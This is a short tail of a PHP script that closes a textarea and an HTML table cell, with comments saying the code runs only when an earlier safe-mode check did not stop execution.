 // Closes the safe-mode textarea and the layout cell. Only reached when the die() in the
 // safe-mode section did not fire, i.e. on PHP builds where safe_mode is still on.
 echo "</textarea>";
 $tb->tdbody ("</td></tr></table>");
 ?>